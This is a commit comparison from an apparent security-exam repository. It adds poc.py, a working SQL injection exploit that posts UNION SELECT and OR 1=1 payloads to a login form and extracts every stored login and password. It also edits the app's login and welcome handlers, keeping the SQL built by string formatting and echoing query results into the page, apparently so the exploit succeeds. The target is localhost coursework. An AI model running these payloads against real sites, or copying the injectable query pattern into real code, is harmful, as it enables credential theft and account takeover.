OkunElya/PC-Seq-Exam-WebApp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: OkunElya:06900e27689bcc342b19c5fcb2addb9bd871b4e3
Branches Tags
OkunElya:master
..
compare: OkunElya:d44800529368f27dacd55fa740dca030e7de3d55
Branches Tags
OkunElya:master

2 Commits
06900e2768 ... d448005293

Author SHA1 Message Date
OkunElya
d448005293 working poc added 
MY BRAIN IS MELTIIINNG
 2025-12-16 02:26:01 +10:00
OkunElya
a7ee7331f8 exploit is now possible 2025-12-16 02:15:51 +10:00
2 changed files with 31 additions and 3 deletions
Expand all files Collapse all files

26
poc.py Normal file
View File

@@ -0,0 +1,26 @@
import requests
import re
BASE_URL = "http://localhost:8000"
login_payload = "' UNION SELECT login FROM users--"
form_data = {"login": login_payload, "password": "' OR 1=1--"}
response_logins = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
password_payload = "' UNION SELECT password FROM users--"
form_data = {"login": password_payload, "password": "' OR 1=1--"}
response_passwords = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
logins_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_logins.text).group(1)
passwords_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_passwords.text).group(1)
logins= logins_raw.split("',), ('")
passwords = passwords_raw.split("',), ('")
if logins and passwords:
for i, (login, password) in enumerate(zip(logins, passwords)):
print(f" {i+1}. Логин: {login:<20} Пароль: {password}")
else:
print("Не удалось извлечь данные.")

8
src/app.py
View File

@@ -95,7 +95,7 @@ async def login_form():
@app.post("/login") @app.post("/login")
async def login(login: str = Form(...), password: str = Form(...)): async def login(login: str = Form(...), password: str = Form(...)):
cursor.execute( cursor.execute(
f"SELECT * FROM users WHERE login='{login}' AND password='{password}'" f"SELECT login FROM users WHERE login='{login}' AND password='{password}'"
) )
user = cursor.fetchall() user = cursor.fetchall()
if user: if user:
@@ -124,8 +124,10 @@ async def welcome(request: Request):
password = request.cookies.get("password") password = request.cookies.get("password")
if not login or not password: if not login or not password:
return RedirectResponse(url="/login") return RedirectResponse(url="/login")
query=f"SELECT login FROM users WHERE login='{login}' AND password='{password}'"
print(f"executing: {query}")
cursor.execute( cursor.execute(
f"SELECT login FROM users WHERE login='{login}' AND password='{password}'" query
) )
user = cursor.fetchall() user = cursor.fetchall()
if user: if user:
@@ -133,7 +135,7 @@ async def welcome(request: Request):
<html> <html>
<head><title>Добро пожаловать</title>{STYLES}</head> <head><title>Добро пожаловать</title>{STYLES}</head>
<body> <body>
<h1>Привет, {user}</h1> <h1>Привет, {str(user)[3:-4]}</h1>
<button onclick=" <button onclick="
document.cookie = 'login=; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/;'; document.cookie = 'login=; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/;';
document.cookie = 'password=; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/;'; document.cookie = 'password=; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/;';